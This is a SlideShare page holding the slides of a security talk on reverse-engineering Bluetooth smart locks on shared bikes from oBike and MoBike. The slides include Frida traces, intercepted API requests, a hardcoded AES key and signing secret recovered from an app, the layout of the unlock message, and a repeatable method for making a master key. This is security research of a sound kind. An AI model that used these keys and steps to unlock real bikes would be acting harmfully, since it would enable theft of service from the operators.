SlideShare a Scribd company logo

Hacking BLE Bicycle Locks for Fun and a Small Profit

Priyanka Aash
Priyanka Aash

"Hack a lock and get free rides! (No free beer yet though...). This talk will explore the ever growing ride sharing economy and look at how the BLE ""Smart"" locks on shared bicycles work. The entire solution will be deconstructed and examined, from the mobile application to its supporting web services and finally communications with the lock. We will look at how to go about analysing communications between a mobile device and the lock, what works, what doesn't. Previous talks on attacking BLE targeted the protocol itself using various hardware and software such as Ubertooth and Wireshark, which could be potentially difficult for someone new wanting to explore BLE and the ever connected IoT world. I'll simplify and stupidify the entire process such that anyone with a mobile phone and basic experience with Frida can go about breaking locks and hacking BLE the world over."

Technology
1 of 55
Download to read offline
Hacking BLE Bicycle Locks for Fun & A Small Profit
1
whoami • From Sunny Singapore • Senior Security Consultant @ MWR • Mobile and Wireless geek – BlackHat USA 2016 – Bad for Enterprise: Attacking BYOD Enterprise Mobile Security Solutions 2
Bike-Sharing Economy and the BLE “Smart” Lock 1 Overview 3 Building a Master Key3 Demo 4 Analyzing Communications 2
Major Players
Major Players 6 Country China China Singapore Founded 2014 2015 2017 Operations 20 Countries 16 Countries 22 Countries Cost SGD$0.50/30min
Bluetooth Low Energy Generic Access Profile (GAP) • Peripheral Small low powered device e.g. bicycle lock • Central High powered computing device e.g. Mobile Phone
Bluetooth Low Energy 8 Generic Attribute Profile (GATT) • Services Groups of Characteristics 16/128-bit UUID • Characteristics A single data point 16/128-bit UUID
Major Components 9
Personal BLE Bicycle Lock
Lock Decomposition
Motor to release lock Logic Controller / BLE
Notch Spring Mechanism Notch Pin
Noke Lock Services and Characteristics
Ubertooth One – Wireshark Capture
Major Components 19
iOS CoreBluetooth CBPeripheral • Remote peripheral devices that the app has discovered advertising or is currently connected to. • -m "*[CBPeripheral readValue*]" • -m "*[CBPeripheral writeValue*]" • -m "*[CBPeripheral setNotifyValue*]" CBPeripheralDelegate • Provides methods called on events relating to discovery, exploration, and interaction with a remote peripheral. • -m "*[* *didUpdateNotificationStateForCharacteristic*]" • -m "*[* *didUpdateValueForCharacteristic*]" 20
Summary… Scan QR Code 01 02 Get Lock Key From Server 04 Request Encrypted Token 05 Gets Encrypted Token 06 Decrypt Token & Unlock! 03 Server Responds with Lock Key
oBike 22
oBike Lock oBike lock teardown and rebuild, dockless share bike rescue: https://youtu.be/Vl3Gl8w8n-Q
24
02 App Checks Lock Status. Uploads Coordinates. 04 App Requests Key Source 05 App Gets Key Source 06 Request Unlock Key 07 Server Responds with Unlock Key 08 Unlock Bike Lock 03 Server Responds with Lock Status http://www.o.bike/download /app.html?m=065002064 01
HTTP Message Encryption POST /api/v2/bike/060511449/lockNo HTTP/1.1 Host: mobile.o.bike Content-Type: application/json version: 3.2.4 Authorization: Bearer ***** {"value":"68693cfa10579681d81837350843342d9 9f0ba4373f9926c53c1f1c88576304d0b936e700388 8288fe949e73eb1d3267b713d2b261829ee04985234 23d6965db28e8b99854bf2adf592e51fb9da3b77068 f647b29caa5f22473ad01ec1011270a9d3a73100292 b0fdf331b17b37564556df790a58489d8cad3f4dd27 6d5ae68a95fc7effefc998de151eeb0983ddc721634 5e7682df8cf2de0d2cbf3a8b7e7c1c8f8604016c377 b0195b0ab9e83c604d"} POST /api/v2/bike/unlockPass HTTP/1.1 Host: mobile.o.bike Content-Type: application/json version: 3.2.4 Authorization: Bearer ***** {"value":"aa47e49f01cc740fdaa87973966 799f94bf02ced7416b15f1cc7f63bf52f50f9 28e76c5d7f911a054188751f7243d68daef4b 69b22432ec2166dc823f29de811e21f4adbfd b826748b9e2573912422b0a51f6a07a5c7be2 bf7d41b56d69945c3ecf3ec94444db5abb26b 8c771fe8eba91cb1a5d336cc2130bde9bcb25 350250bb92c5aa880b2e6c0b3c0004c11ab0f 14eb1182b78fb3dcb5eb68e61205ae5048"}
HTTP Message Encryption - AES 27 9386 ms | | +[OBikeEncrypt aesEncryptString:{"deviceId":"1521828969000- 8035385","dateTime":"1521984609867.631836","longitude":103.8331503422035,"latitude":1.38163138646 7611}&58bc93f4ac249b829174520a5afe733503f371f8] 9388 ms | | | +[OBikeEncrypt aesEncryptData:<7b226465 76696365 4964223a 22313532 31383238 39363930 30302d38 30333533 3835222c 22646174 6554696d 65223a22 31353231 39383436 30393836 372e3633 31383336 222c226c 6f6e6769 74756465 223a3130 332e3833 33313530 33343232 3033352c 226c6174 69747564 65223a31 2e333831 36333133 38363436 37363131 7d263538 62633933 66346163 32343962 38323931 37343532 30613561 66653733 33353033 66333731 6638> keyData:<6f42694f 534d5946 557a4c65 64333234>] keyData:<6f42694f 534d5946 557a4c65 64333234> = oBiOSMYFUzLed324 oBiOSMYFUzLed 324AES Key
HTTP Message Encryption – SHA1Sum 28 POST /api/v2/bike/unlockPass HTTP/1.1 Host: mobile.o.bike Content-Type: application/json version: 3.2.4 { "bikeId":"060511449", "deviceId":"1521828969000-8035385", "dateTime":"1521984617263.854980", "keySource":"c4f1dc24" }&ad6dad370f01782adfe200584ff63be31af29069 { "bikeId":"060511449", "deviceId":"1521828969000-8035385", "dateTime":"1521984617263.854980", "keySource":"c4f1dc24" }& oBiOSX4buhBMG 324
POST /api/v2/bike/060511449/lockNo HTTP/1.1 Host: mobile.o.bike Content-Type: application/json version: 3.2.4 { "deviceId":"1521828969000-8035385", "dateTime":"1521984609867.631836", "longitude":103.8XXXXXXXX, "latitude":1.3XXXXXXXX }&58bc93f4ac249b829174520a5afe73 02 App Checks Lock Status. Uploads Coordinates. http://www.o.bike/download /app.html?m=065002064 01
03 Server Responds with Lock Status HTTP/1.1 200 Content-Type: application/json;charset=UTF-8 Connection: close Vary: Accept-Encoding Content-Length: 93 {"data": {"lockNo":"639BADF22", "lockType":2, "faultBike":false}, "success":true,"errorCode":100}
16504 ms -[BluetoothManager peripheral:0x1742f6080 didDiscoverCharacteristicsForService:0x17667cb00 error:0x0] 16506 ms | -[CBPeripheral setNotifyValue:0x1 forCharacteristic: <CBCharacteristic: 0x1704ae100, UUID = FFF6, properties = 0x16, value = (null), notifying = NO>] 16515 ms | -[OBikeBluetoothManager BLEDidNotify] 16519 ms | | | | | | -[CBPeripheral writeValue:0x17483f980 forCharacteristic:0x1704ae100 type:0x1] 16519 ms | | | | | | writeValue -> _NSInlineData 16519 ms | | | | | | forCharacteristic -> CBCharacteristic 04 App Requests Key Source
16518 ms | | | | | +[BluetoothSendMessage sendRentBikeInstructionWithCBPeripheral:0x1742f6080 CBCharacteristic:0x1704ae100 Longti:0x0 Lat:0x0] 16519 ms | | | | | | +[BluetoothSendMessage setValueForRentBike:0x0 Lat:0x0] 16519 ms | | | | | | -[CBPeripheral writeValue:0x17483f980 forCharacteristic:0x1704ae100 type:0x1] 16519 ms | | | | | | writeValue -> _NSInlineData 16519 ms | | | | | | forCharacteristic -> CBCharacteristic 16774 ms -[BluetoothManager peripheral:0x1742f6080 didUpdateValueForCharacteristic:0x1704ae100 error:0x0] 16775 ms | | -[HandleBluetoothMessage checkBlueToothDataWith:0x170824b40] 16775 ms | | | +[BluetoothSendMessage GetBcc:0x170013ab0 size:0xc] 16781 ms | | -[OBikeBluetoothManager BLEGetBike:0x17045fec0] 16783 ms | | | +[OBikeEncrypt aesEncryptString:{"bikeId":"060511449","deviceId":“XXXXXXXXXX", "dateTime":"1521984617263.854980","keySource":"c4f1dc24"} &ad6dad370f01782adfe200584ff63be31af29069] 05 App Gets Key Source
POST /api/v2/bike/unlockPass HTTP/1.1 Host: mobile.o.bike Content-Type: application/json version: 3.2.4 { "bikeId":"060511449", "deviceId":"1521828969000-8035385", "dateTime":"1521984617263.854980", "keySource":"c4f1dc24" }&ad6dad370f01782adfe200584ff63be31af29069 HTTP/1.1 200 Content-Type: application/json;charset=UTF-8 Connection: close Vary: Accept-EncodingContent-Length: 130 {"data":{ "encryptionKey":180, "keys":"8be1be17d41e8fdff1ae1c82e4500fec", "serverTime":1521984619298 },"success":true,"errorCode":100} 06 Request Unlock Key 07 Server Responds with Unlock Key
19106 ms -[OBikeBluetoothManager openLock:0xb000000000000b43 keys:0x1718648c0 serverTime:0xb0001625d5a43223] 19107 ms | | -[BluetoothManager openLock:0xa383430343937327 Time:0x170440690 Key:0x1718648c0 encryptionKey:0xb4] 19108 ms | | | | | +[BluetoothSendMessage setValueForUnlock:1521984619.298000 Index:0xb4 Phone:0xa383430343937327 Key:8be1be17d41e8fdff1ae1c82e4500fec] 19113 ms | | | | | | +[BluetoothSendMessage ToHex:0x5ab7a46b] 19114 ms | | | | | | +[BluetoothSendMessage dataFromHexString:0x174a48550] 19114 ms | | | | | | +[BluetoothSendMessage dataFromHexString:0x174a28da0] 19114 ms | | | | | | +[BluetoothSendMessage GetBcc:0x174a45fd0 size:0x19] 19117 ms | | | | | | +[BluetoothSendMessage GetBcc] retval: 0xff 19118 ms | | | | | -[CBPeripheral writeValue:0x174a54340 forCharacteristic:0x1704ae100 type:0x1] 19118 ms | | | | | writeValue -> NSConcreteMutableData 19118 ms | | | | | forCharacteristic -> CBCharacteristic 19127 ms | | | | | -[CBPeripheral writeValue:0x174a53ef0 forCharacteristic:0x1704ae100 type:0x1] 19127 ms | | | | | writeValue -> NSConcreteMutableData 19127 ms | | | | | forCharacteristic -> CBCharacteristic 08 Unlock Bike Lock
Unlock Algorithm Message 1 ??? Message Length Command 67 74 18 82 Message 2 AES Key (Truncated) BCC 8b e1 be 17 d4 1e 8f df f1 ae 1c 82 ff +[BluetoothSendMessage setValueForUnlock:1521984619.298000 Index:0xb4 Phone:0xa383430343937327 Key:8be1be17d41e8fdff1ae1c82e4500fec] Key Index ??? Date Time b4 00 00 02 79 40 48 00 6b a4 b7 5a BCC Calculation: for i in bytearr { x ^= i } return x bytearr = Command … AES Key
oBike Demo 36
MoBike 38
02 App Checks Lock Status. Uploads Coordinates. 04 Server Responds with Unlock Key 05 03 Server Responds with Lock Status http://www.mobike.com/down load/app.html?b=AXXXXXXX 01 Unlock Bike Lock
HTTP Message Integrity Check 41 POST /api/v2/rentmgr/unlockBike.do?sign=b9441790c2e3c42a57b439b51995f546 HTTP/1.1 Host: app.mobike.com time: 1530100847000 mobileNo: +6512345678 accesstoken: XXXXXXXXXXXXXXXX platform: 0 Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 445 accesstoken=XXXXXXXXXXXXXXXX&bikecode=A0000XXXXX&biketype=0&btEnabled=1&channel=1&clie nt_id=ios&epdata=Es7dCTkXiZ1IV3H6z%2BS9R%2BYzRjFby0T4ADUNKh0aXm6wfZzfJtQEQ5IC%2By5lZYG KFVy8I9vP6wwvkKCEqxNSMMCM3WespduyU8Svj7qyadFV4pN/nbC1behZa7ew3V0G8ofy6udhTkjbWLcjWeWvi oJwrELB24aALccUKxCoMds%3D&latitude=1.3XXX&longitude=103.8XXX&mobileNo=+6512345678&time =1530100847000&timestamp=1530100847.123456&userid=XXXXXXXXX
HTTP Message Encryption 42 30714 ms | +[RSA encryptString:XXXXXXXXXXuseridXXXXXXX#1530031691.737942 publicKey:MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDCi/VezJp6KaJNXZCHpQ4YmKxlWrcrddow5pHDX3vHeiUqdOoJZJoBp UvFuFdlWEqP7itWNcPnuYAqRwXkh6xWD1oM4MrK4eH8/AzdGIgrcgq+pbB3DymgEujkHBhrxXqFiUS2OjfebKwU0xJTPQM/KcxjqGDZ xzswOxFJDxyKcwIDAQAB] enter mbk_lowercaseMd5 -> accesstoken=XXXXXXXXXX&bikecode=A0000XXXXX&biketype=0&btEnabled=1&channel=1&client_id=ios&epdata=Es7dCT kXiZ1IV3H6z+S9R+YzRjFby0T4ADUNKh0aXm6wfZzfJtQEQ5IC+y5lZYGKFVy8I9vP6wwvkKCEqxNSMMCM3WespduyU8Svj7qyadFV4 pN/nbC1behZa7ew3V0G8ofy6udhTkjbWLcjWeWvioJwrELB24aALccUKxCoMds=&latitude=1.381585998461937&longitude=10 3.8330852148159&mobileNo=+65XXXXXXXX&time=1530031691000&timestamp=1530031691.737942&userid=XXXXXXXXX@io ssecret leave mbk_lowercaseMd5 -> b9441790c2e3c42a57b439b51995f546
02 App Checks Lock Status. Uploads Coordinates. http://www.o.bike/download /app.html?m=065002064 01 POST /api/v2/rentmgr/unlockBike.do?sign=9623f419340536f95c31 4d81c4c2b548 HTTP/1.1 bikecode=A0000XXXXX&biketype=0&btEnabled=1&channel=1&cl ient_id=ios&epdata=ML1G%2BNjHnhzQPMoRZwtBx5k3c0yOBpBFZK ePvb3WsR0%2BWBvtT7saxcwIwbI6JAkG27HGjWKMGjeCwUyvw1zOgOA 17Lybmbv30ltfBwUkeFmpgklpG2YMEgFEEdCjYxhskfMtoLKWCz3WFB riiZ5S6yHnH5aT1yKe/YB7mMo1f0U%3D&latitude=1.3XXX&longit ude=103.8XXXX&timestamp=1530096030.920647&userid=XXXXX
03 Server Responds with Lock Status Faulty HTTP/1.1 200 Content-Type: application/json;charset=UTF-8 Connection: close { "bikeHardwareType": 2, "bikeId": "AXXXXXXX", ... "message": "Our apologies, this bike needs maintenance, please use another one", ... } Good HTTP/1.1 200 Content-Type: application/json;charset=UTF-8 Connection: close { "bikeHardwareType": 2, "bikeId": "AXXXXXXX", ... "object": { "authkey": "", "data": "001BB441CB88B4034565E1C7BE448CD4B3D9F5CAA8452A2323 5201", "orderid": "MBKA0000XXXXXXXX", ... 04 Server Responds with Unlock Key
05 Unlock Bike Lock 32484 ms -[MBKUnlockBikeData setData:001BB441CB88B4034565E1C7BE448CD4B3D9F5CAA8452A23235201] 35446 ms -[MBKPeripheral peripheral:<CBPeripheral: 0x1744ee380, identifier = 2B7D32FB-8B34-4C58-BB57- A37976F63FC3, name = mobike, state = connected> didDiscoverCharacteristicsForService:<CBService: 0x172679c80, isPrimary = YES, UUID = A000FAA0-0047-005A-0052-6D6F62696B65> error:0x0] 35449 ms | -[CBPeripheral setNotifyValue:0x1 forCharacteristic:<CBCharacteristic: 0x174aa45c0, UUID = A000FEE1-0047-005A-0052-6D6F62696B65, properties = 0x10, value = <31>, notifying = NO>] 35452 ms | -[CBPeripheral setNotifyValue:0x1 forCharacteristic:<CBCharacteristic: 0x174aa46e0, UUID = A000FEE0-0047-005A-0052-6D6F62696B65, properties = 0x8, value = <33324634 46454444 37363546 38453530 46324232>, notifying = NO>]
05 Unlock Bike Lock 35591 ms | -[MBKPeripheral writeString:30001BB441CB88B40345] 35592 ms | | -[CBPeripheral writeValue:0x17525e1b0 forCharacteristic:0x174aa46e0 type:0x0] 35592 ms | | writeValue -> _NSInlineData 35592 ms | | forCharacteristic -> CBCharacteristic
05 Unlock Bike Lock 35666 ms | -[MBKPeripheral writeString:3165E1C7BE448CD4B3D9] 35667 ms | | -[CBPeripheral writeValue:0x17145c410 forCharacteristic:0x174aa46e0 type:0x0] 35667 ms | | writeValue -> _NSInlineData 35667 ms | | forCharacteristic -> CBCharacteristic
05 Unlock Bike Lock 35739 ms | -[MBKPeripheral writeString:32F5CAA8452A23235201] 35741 ms | | -[CBPeripheral writeValue:0x17125e720 forCharacteristic:0x174aa46e0 type:0x0] 35741 ms | | writeValue -> _NSInlineData 35741 ms | | forCharacteristic -> CBCharacteristic
Unlock Algorithm Message 1 Index ? Message 30 001BB441CB88B40345 32484 ms -[MBKUnlockBikeData setData:001BB441CB88B4034565E1C7BE448CD4B3D9F5CAA8452A23235201] Message 2 Index ? Message 31 65E1C7BE448CD4B3D9 Message 3 Index ? Message 32 F5CAA8452A23235201
MoBike Demo 50
Repeatable Process 1. Enumerate Services and Characteristics 2. Capture Characteristics Settings -m "*[CBPeripheral setNotifyValue*]" 3. Capture BLE Reads & BLE Writes -m "*[CBPeripheral readValue*]" -m "*[CBPeripheral writeValue*]" 52
53 Thank you for listening!
Q&A

Recommended

44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root44CON
 
Digital signatures
Digital signaturesDigital signatures
Digital signaturesApurv Gourav
 
Digital Signature
Digital SignatureDigital Signature
Digital Signaturenayakslideshare
 
Using Amazon Machine Learning to Identify Trends in IoT Data - Technical 201
Using Amazon Machine Learning to Identify Trends in IoT Data - Technical 201Using Amazon Machine Learning to Identify Trends in IoT Data - Technical 201
Using Amazon Machine Learning to Identify Trends in IoT Data - Technical 201Amazon Web Services
 
Using amazon machine learning to identify trends in io t data technical 201
Using amazon machine learning to identify trends in io t data technical 201Using amazon machine learning to identify trends in io t data technical 201
Using amazon machine learning to identify trends in io t data technical 201Amazon Web Services
 
Spark Summit Dublin 2017 - MemSQL - Real-Time Image Recognition
Spark Summit Dublin 2017 - MemSQL - Real-Time Image RecognitionSpark Summit Dublin 2017 - MemSQL - Real-Time Image Recognition
Spark Summit Dublin 2017 - MemSQL - Real-Time Image RecognitionSingleStore
 
Transformation 101 - Business Model Workshop
Transformation 101 - Business Model WorkshopTransformation 101 - Business Model Workshop
Transformation 101 - Business Model WorkshopDaniel Li
 
MongoDB .local Munich 2019: Telediagnosis@Daimler powered by MongoDB
MongoDB .local Munich 2019: Telediagnosis@Daimler powered by MongoDBMongoDB .local Munich 2019: Telediagnosis@Daimler powered by MongoDB
MongoDB .local Munich 2019: Telediagnosis@Daimler powered by MongoDBMongoDB
 

Recommended

44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root44CON
 
Digital signatures
Digital signaturesDigital signatures
Digital signaturesApurv Gourav
 
Digital Signature
Digital SignatureDigital Signature
Digital Signaturenayakslideshare
 
Using Amazon Machine Learning to Identify Trends in IoT Data - Technical 201
Using Amazon Machine Learning to Identify Trends in IoT Data - Technical 201Using Amazon Machine Learning to Identify Trends in IoT Data - Technical 201
Using Amazon Machine Learning to Identify Trends in IoT Data - Technical 201Amazon Web Services
 
Using amazon machine learning to identify trends in io t data technical 201
Using amazon machine learning to identify trends in io t data technical 201Using amazon machine learning to identify trends in io t data technical 201
Using amazon machine learning to identify trends in io t data technical 201Amazon Web Services
 
Spark Summit Dublin 2017 - MemSQL - Real-Time Image Recognition
Spark Summit Dublin 2017 - MemSQL - Real-Time Image RecognitionSpark Summit Dublin 2017 - MemSQL - Real-Time Image Recognition
Spark Summit Dublin 2017 - MemSQL - Real-Time Image RecognitionSingleStore
 
Transformation 101 - Business Model Workshop
Transformation 101 - Business Model WorkshopTransformation 101 - Business Model Workshop
Transformation 101 - Business Model WorkshopDaniel Li
 
MongoDB .local Munich 2019: Telediagnosis@Daimler powered by MongoDB
MongoDB .local Munich 2019: Telediagnosis@Daimler powered by MongoDBMongoDB .local Munich 2019: Telediagnosis@Daimler powered by MongoDB
MongoDB .local Munich 2019: Telediagnosis@Daimler powered by MongoDBMongoDB
 
IMS12 ims performance tools
IMS12 ims performance toolsIMS12 ims performance tools
IMS12 ims performance toolsRobert Hain
 
[CB16] BLE authentication design challenges on smartphone controlled IoT devi...
[CB16] BLE authentication design challenges on smartphone controlled IoT devi...[CB16] BLE authentication design challenges on smartphone controlled IoT devi...
[CB16] BLE authentication design challenges on smartphone controlled IoT devi...CODE BLUE
 
Digital Signature.ppt power ponit presentation
Digital Signature.ppt power ponit presentationDigital Signature.ppt power ponit presentation
Digital Signature.ppt power ponit presentationArunsunaiComputer
 
How Payment Cards Really Work?
How Payment Cards Really Work?How Payment Cards Really Work?
How Payment Cards Really Work?Dmitry Buzdin
 
IWMW 1997: Security and Performance Issues
IWMW 1997: Security and Performance IssuesIWMW 1997: Security and Performance Issues
IWMW 1997: Security and Performance IssuesIWMW
 
Industrial protocols for pentesters
Industrial protocols for pentestersIndustrial protocols for pentesters
Industrial protocols for pentestersPositive Hack Days
 
Detecting Malicious Websites using Machine Learning
Detecting Malicious Websites using Machine LearningDetecting Malicious Websites using Machine Learning
Detecting Malicious Websites using Machine LearningAndrew Beard
 
Alexander Timorin, Dmitry Efanov. Industrial protocols for pentesters
Alexander Timorin, Dmitry Efanov. Industrial protocols for pentestersAlexander Timorin, Dmitry Efanov. Industrial protocols for pentesters
Alexander Timorin, Dmitry Efanov. Industrial protocols for pentestersPositive Hack Days
 
Industrial protocols for pentesters
Industrial protocols for pentestersIndustrial protocols for pentesters
Industrial protocols for pentestersPositive Hack Days
 
Industrial protocols for pentesters
Industrial protocols for pentestersIndustrial protocols for pentesters
Industrial protocols for pentestersAleksandr Timorin
 
Mike lawell executionplansformeremortals_2015
Mike lawell executionplansformeremortals_2015Mike lawell executionplansformeremortals_2015
Mike lawell executionplansformeremortals_2015mlawell
 
Software Attacks on Hardware Wallets
Software Attacks on Hardware WalletsSoftware Attacks on Hardware Wallets
Software Attacks on Hardware WalletsPriyanka Aash
 
Demystifying Apple 'Pie' & TouchID
Demystifying Apple 'Pie' & TouchIDDemystifying Apple 'Pie' & TouchID
Demystifying Apple 'Pie' & TouchIDSebastián Guerrero Selma
 
SplunkLive! Munich 2018: Getting Started with Splunk Enterprise
SplunkLive! Munich 2018: Getting Started with Splunk EnterpriseSplunkLive! Munich 2018: Getting Started with Splunk Enterprise
SplunkLive! Munich 2018: Getting Started with Splunk EnterpriseSplunk
 
NetConf 2018 BPF Observability
NetConf 2018 BPF ObservabilityNetConf 2018 BPF Observability
NetConf 2018 BPF ObservabilityBrendan Gregg
 
Gc crash course (1)
Gc crash course (1)Gc crash course (1)
Gc crash course (1)Tier1 app
 
MyIX Updates
MyIX UpdatesMyIX Updates
MyIX UpdatesMyNOG
 
Elliptic Curve Cryptography
Elliptic Curve CryptographyElliptic Curve Cryptography
Elliptic Curve CryptographyNapier University
 
I pv6 dhcp
I pv6 dhcpI pv6 dhcp
I pv6 dhcpeufronio
 
[Project report]digital speedometer with password enabled speed controlling(1...
[Project report]digital speedometer with password enabled speed controlling(1...[Project report]digital speedometer with password enabled speed controlling(1...
[Project report]digital speedometer with password enabled speed controlling(1...Shivam Patel
 
Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsPriyanka Aash
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfPriyanka Aash
 

More Related Content

Similar to Hacking BLE Bicycle Locks for Fun and a Small Profit

IMS12 ims performance tools
IMS12 ims performance toolsIMS12 ims performance tools
IMS12 ims performance toolsRobert Hain
 
[CB16] BLE authentication design challenges on smartphone controlled IoT devi...
[CB16] BLE authentication design challenges on smartphone controlled IoT devi...[CB16] BLE authentication design challenges on smartphone controlled IoT devi...
[CB16] BLE authentication design challenges on smartphone controlled IoT devi...CODE BLUE
 
Digital Signature.ppt power ponit presentation
Digital Signature.ppt power ponit presentationDigital Signature.ppt power ponit presentation
Digital Signature.ppt power ponit presentationArunsunaiComputer
 
How Payment Cards Really Work?
How Payment Cards Really Work?How Payment Cards Really Work?
How Payment Cards Really Work?Dmitry Buzdin
 
IWMW 1997: Security and Performance Issues
IWMW 1997: Security and Performance IssuesIWMW 1997: Security and Performance Issues
IWMW 1997: Security and Performance IssuesIWMW
 
Industrial protocols for pentesters
Industrial protocols for pentestersIndustrial protocols for pentesters
Industrial protocols for pentestersPositive Hack Days
 
Detecting Malicious Websites using Machine Learning
Detecting Malicious Websites using Machine LearningDetecting Malicious Websites using Machine Learning
Detecting Malicious Websites using Machine LearningAndrew Beard
 
Alexander Timorin, Dmitry Efanov. Industrial protocols for pentesters
Alexander Timorin, Dmitry Efanov. Industrial protocols for pentestersAlexander Timorin, Dmitry Efanov. Industrial protocols for pentesters
Alexander Timorin, Dmitry Efanov. Industrial protocols for pentestersPositive Hack Days
 
Industrial protocols for pentesters
Industrial protocols for pentestersIndustrial protocols for pentesters
Industrial protocols for pentestersPositive Hack Days
 
Industrial protocols for pentesters
Industrial protocols for pentestersIndustrial protocols for pentesters
Industrial protocols for pentestersAleksandr Timorin
 
Mike lawell executionplansformeremortals_2015
Mike lawell executionplansformeremortals_2015Mike lawell executionplansformeremortals_2015
Mike lawell executionplansformeremortals_2015mlawell
 
Software Attacks on Hardware Wallets
Software Attacks on Hardware WalletsSoftware Attacks on Hardware Wallets
Software Attacks on Hardware WalletsPriyanka Aash
 
SplunkLive! Munich 2018: Getting Started with Splunk Enterprise
SplunkLive! Munich 2018: Getting Started with Splunk EnterpriseSplunkLive! Munich 2018: Getting Started with Splunk Enterprise
SplunkLive! Munich 2018: Getting Started with Splunk EnterpriseSplunk
 
NetConf 2018 BPF Observability
NetConf 2018 BPF ObservabilityNetConf 2018 BPF Observability
NetConf 2018 BPF ObservabilityBrendan Gregg
 
Gc crash course (1)
Gc crash course (1)Gc crash course (1)
Gc crash course (1)Tier1 app
 
MyIX Updates
MyIX UpdatesMyIX Updates
MyIX UpdatesMyNOG
 
I pv6 dhcp
I pv6 dhcpI pv6 dhcp
I pv6 dhcpeufronio
 
[Project report]digital speedometer with password enabled speed controlling(1...
[Project report]digital speedometer with password enabled speed controlling(1...[Project report]digital speedometer with password enabled speed controlling(1...
[Project report]digital speedometer with password enabled speed controlling(1...Shivam Patel
 

Similar to Hacking BLE Bicycle Locks for Fun and a Small Profit (20)

IMS12 ims performance tools
IMS12 ims performance toolsIMS12 ims performance tools
IMS12 ims performance tools
 
[CB16] BLE authentication design challenges on smartphone controlled IoT devi...
[CB16] BLE authentication design challenges on smartphone controlled IoT devi...[CB16] BLE authentication design challenges on smartphone controlled IoT devi...
[CB16] BLE authentication design challenges on smartphone controlled IoT devi...
 
Digital Signature.ppt power ponit presentation
Digital Signature.ppt power ponit presentationDigital Signature.ppt power ponit presentation
Digital Signature.ppt power ponit presentation
 
How Payment Cards Really Work?
How Payment Cards Really Work?How Payment Cards Really Work?
How Payment Cards Really Work?
 
IWMW 1997: Security and Performance Issues
IWMW 1997: Security and Performance IssuesIWMW 1997: Security and Performance Issues
IWMW 1997: Security and Performance Issues
 
Industrial protocols for pentesters
Industrial protocols for pentestersIndustrial protocols for pentesters
Industrial protocols for pentesters
 
Detecting Malicious Websites using Machine Learning
Detecting Malicious Websites using Machine LearningDetecting Malicious Websites using Machine Learning
Detecting Malicious Websites using Machine Learning
 
Alexander Timorin, Dmitry Efanov. Industrial protocols for pentesters
Alexander Timorin, Dmitry Efanov. Industrial protocols for pentestersAlexander Timorin, Dmitry Efanov. Industrial protocols for pentesters
Alexander Timorin, Dmitry Efanov. Industrial protocols for pentesters
 
Industrial protocols for pentesters
Industrial protocols for pentestersIndustrial protocols for pentesters
Industrial protocols for pentesters
 
Industrial protocols for pentesters
Industrial protocols for pentestersIndustrial protocols for pentesters
Industrial protocols for pentesters
 
Mike lawell executionplansformeremortals_2015
Mike lawell executionplansformeremortals_2015Mike lawell executionplansformeremortals_2015
Mike lawell executionplansformeremortals_2015
 
Software Attacks on Hardware Wallets
Software Attacks on Hardware WalletsSoftware Attacks on Hardware Wallets
Software Attacks on Hardware Wallets
 
Demystifying Apple 'Pie' & TouchID
Demystifying Apple 'Pie' & TouchIDDemystifying Apple 'Pie' & TouchID
Demystifying Apple 'Pie' & TouchID
 
SplunkLive! Munich 2018: Getting Started with Splunk Enterprise
SplunkLive! Munich 2018: Getting Started with Splunk EnterpriseSplunkLive! Munich 2018: Getting Started with Splunk Enterprise
SplunkLive! Munich 2018: Getting Started with Splunk Enterprise
 
NetConf 2018 BPF Observability
NetConf 2018 BPF ObservabilityNetConf 2018 BPF Observability
NetConf 2018 BPF Observability
 
Gc crash course (1)
Gc crash course (1)Gc crash course (1)
Gc crash course (1)
 
MyIX Updates
MyIX UpdatesMyIX Updates
MyIX Updates
 
Elliptic Curve Cryptography
Elliptic Curve CryptographyElliptic Curve Cryptography
Elliptic Curve Cryptography
 
I pv6 dhcp
I pv6 dhcpI pv6 dhcp
I pv6 dhcp
 
[Project report]digital speedometer with password enabled speed controlling(1...
[Project report]digital speedometer with password enabled speed controlling(1...[Project report]digital speedometer with password enabled speed controlling(1...
[Project report]digital speedometer with password enabled speed controlling(1...
 

More from Priyanka Aash

Digital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsDigital Personal Data Protection (DPDP) Practical Approach For CISOs
Digital Personal Data Protection (DPDP) Practical Approach For CISOsPriyanka Aash
 
Verizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfVerizon Breach Investigation Report (VBIR).pdf
Verizon Breach Investigation Report (VBIR).pdfPriyanka Aash
 
Top 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfTop 10 Security Risks .pptx.pdf
Top 10 Security Risks .pptx.pdfPriyanka Aash
 
Simplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfSimplifying data privacy and protection.pdf
Simplifying data privacy and protection.pdfPriyanka Aash
 
Generative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfGenerative AI and Security (1).pptx.pdf
Generative AI and Security (1).pptx.pdfPriyanka Aash
 
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfEVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdf
EVERY ATTACK INVOLVES EXPLOITATION OF A WEAKNESS.pdfPriyanka Aash
 
Cyber Truths_Are you Prepared version 1.1.pptx.pdf
